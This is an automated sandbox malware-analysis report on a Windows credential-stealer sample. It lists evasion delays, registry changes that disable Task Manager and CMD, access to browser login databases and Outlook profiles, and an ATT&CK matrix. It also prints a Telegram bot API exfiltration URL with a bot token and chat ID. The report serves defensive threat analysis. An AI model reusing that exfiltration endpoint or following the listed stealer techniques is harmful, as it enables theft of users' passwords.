            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597317Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596856Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596749Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596618Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596465Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596249Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596139Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595484Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595374Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595265Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594390Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594281Jump to behavior
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006371000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2960421938.000000000633D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006354000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeAPI call chain: ExitProcess graph end nodegraph_0-4589
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeAPI call chain: ExitProcess graph end nodegraph_0-4747
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_701A1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_701A1B5F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess created: C:\Users\user\Desktop\xXUnP7uCBJ.exe "C:\Users\user\Desktop\xXUnP7uCBJ.exe"Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeQueries volume information: C:\Users\user\Desktop\xXUnP7uCBJ.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: xXUnP7uCBJ.exe PID: 5856, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: xXUnP7uCBJ.exe PID: 5856, type: MEMORYSTR
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: xXUnP7uCBJ.exe PID: 5856, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: xXUnP7uCBJ.exe PID: 5856, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: xXUnP7uCBJ.exe PID: 5856, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            xXUnP7uCBJ.exe58%VirustotalBrowse
            xXUnP7uCBJ.exe58%ReversingLabsWin32.Ransomware.TelegramRAT
            xXUnP7uCBJ.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nswC272.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nswC272.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.181.238
            truefalse
              high
              drive.usercontent.google.com
              216.58.206.65
              truefalse
                high
                reallyfreegeoip.org
                104.21.64.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://drive.google.com/_xXUnP7uCBJ.exe, 00000005.00000002.2960421938.000000000633D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://www.google.comxXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://checkip.dyndns.org/OxXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006354000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgxXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036AE4000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036B1D000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036935000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000368E5000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036A53000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/botxXUnP7uCBJ.exe, 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.jsxXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036A53000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgxXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036768000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgxXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036750000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/W13-xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006371000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2400153476.0000000006389000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.usercontent.google.com/xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006371000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2400153476.0000000006389000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgxXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036AE4000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036B1D000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036750000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036935000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036744000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000368E5000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036A53000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://apis.google.comxXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comxXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036AE4000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036B1D000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036750000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036935000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000368E5000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036A53000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorxXUnP7uCBJ.exefalse
                                                            high
                                                            http://api.telegram.orgxXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036AE4000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036B1D000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036935000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000368E5000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036A53000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/gxXUnP7uCBJ.exe, 00000005.00000002.2960421938.000000000633D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000366D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reallyfreegeoip.org/xml/xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036750000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    142.250.181.238
                                                                    drive.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    149.154.167.220
                                                                    api.telegram.orgUnited Kingdom
                                                                    62041TELEGRAMRUfalse
                                                                    193.122.6.168
                                                                    checkip.dyndns.comUnited States
                                                                    31898ORACLE-BMC-31898USfalse
                                                                    104.21.64.1
                                                                    reallyfreegeoip.orgUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    216.58.206.65
                                                                    drive.usercontent.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1588130
                                                                    Start date and time:2025-01-10 21:38:32 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 8m 25s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:8
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:xXUnP7uCBJ.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:95125d2296df5f467e524ca8978bbe74f0f3ce9520f6014d7a7172b2d7c29f86.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 96%
                                                                    • Number of executed functions: 153
                                                                    • Number of non-executed functions: 111
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    TimeTypeDescription
                                                                    15:41:15API Interceptor449x Sleep call for process: xXUnP7uCBJ.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    149.154.167.2204UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                          https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                            19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        193.122.6.168ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        checkip.dyndns.com4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 158.101.44.242
                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 132.226.247.73
                                                                                        9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 193.122.130.0
                                                                                        FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 132.226.8.169
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        reallyfreegeoip.org4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.112.1
                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.48.1
                                                                                        hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.48.1
                                                                                        19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.112.1
                                                                                        9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.32.1
                                                                                        y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.80.1
                                                                                        FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.32.1
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        api.telegram.org4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 149.154.167.220
                                                                                        19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        ORACLE-BMC-31898US4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 158.101.44.242
                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 193.122.6.168
